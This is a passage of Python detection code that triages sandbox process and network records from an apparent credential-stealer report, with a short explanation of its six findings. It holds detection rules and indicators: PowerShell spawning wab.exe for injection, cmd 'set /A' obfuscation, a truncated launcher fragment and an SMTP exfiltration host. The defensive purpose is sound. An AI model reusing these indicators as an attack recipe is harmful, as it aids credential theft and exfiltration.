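SMTP_PORTS = {25, 465, 587}


def triage(procs, nets):
    """Return a list of (pid, reason); an empty list means nothing matched."""
    image_of = {p.pid: p.image.lower() for p in procs}
    findings = []
    for p in procs:
        img, parent, cmd = p.image.lower(), p.parent_image.lower(), p.cmdline.lower()
        if parent in SCRIPT_HOSTS and img == "powershell.exe":
            findings.append((p.pid, "script host launched PowerShell"))
        if parent == "powershell.exe" and img == "cmd.exe" and "set /a" in cmd:
            findings.append((p.pid, "cmd.exe arithmetic used to build a string (set /A)"))
        if parent == "powershell.exe" and img in INJECTION_HOSTS:
            findings.append((p.pid, f"PowerShell started {img}, a common injection host"))
    for n in nets:
        img = image_of.get(n.pid, "?")
        if n.port in SMTP_PORTS and img not in MAIL_CLIENTS:
            findings.append((n.pid, f"{img} opened SMTP port {n.port} to {n.dst}"))
        if n.dst == "ip-api.com" and "fields=hosting" in n.http_path:
            findings.append((n.pid, f"{img} asked ip-api.com whether its egress IP is a hosting range"))
    return findings


# Constructed from the report.  Parent PIDs for explorer.exe and svchost.exe
# are placeholders; LAUNCHER stands in for the obfuscated script body.
LAUNCHER = '"<#...#>;$everwho=(cmd /c set /A 115^^0);..."'
PROCS = [
    Proc(2532, "wscript.exe", r'"C:\WINDOWS\System32\WScript.exe" '
         r'"C:\Users\admin\AppData\Local\Temp\8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs"',
         1, "explorer.exe"),
    Proc(1068, "powershell.exe", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ' + LAUNCHER,
         2532, "wscript.exe"),
    Proc(4076, "conhost.exe", r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1", 1068, "powershell.exe"),
    Proc(6044, "cmd.exe", r'"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0', 1068, "powershell.exe"),
    Proc(2260, "powershell.exe", r'"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" ' + LAUNCHER,
         1068, "powershell.exe"),
    Proc(6680, "cmd.exe", r'"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0', 2260, "powershell.exe"),
    Proc(5672, "wab.exe", r'"C:\Program Files (x86)\windows mail\wab.exe"', 2260, "powershell.exe"),
    Proc(1404, "slui.exe", r"C:\WINDOWS\System32\slui.exe -Embedding", 900, "svchost.exe"),
]
NETS = [
    Net(5672, "ocsp.pki.goog", 80, "/gsr1/"),              # OCSP check, path shortened; must not fire
    Net(5672, "ip-api.com", 80, "/line/?fields=hosting"),
    Net(5672, "mail.ardsmmm.com", 587),                     # SMTP host from the extracted config
    Net(3996, "login.live.com", 443),                       # Windows background traffic
]

if __name__ == "__main__":
    for pid, reason in triage(PROCS, NETS):
        print(f"PID {pid}: {reason}")
```

The six findings it returns line up with the report's own signatures: Starts POWERSHELL.EXE (from wscript.exe), Evaluates numerical expressions in cmd (both cmd.exe children), the PowerShell-spawned wab.exe that the YARA hit and the credential-theft signatures attach to, Checks for external IP, and Connects to SMTP port. slui.exe, the OCSP lookup and the login.live.com session produce nothing, which is the point of keying the rules on parent/child relationships and on which process opens the socket rather than on the destination alone.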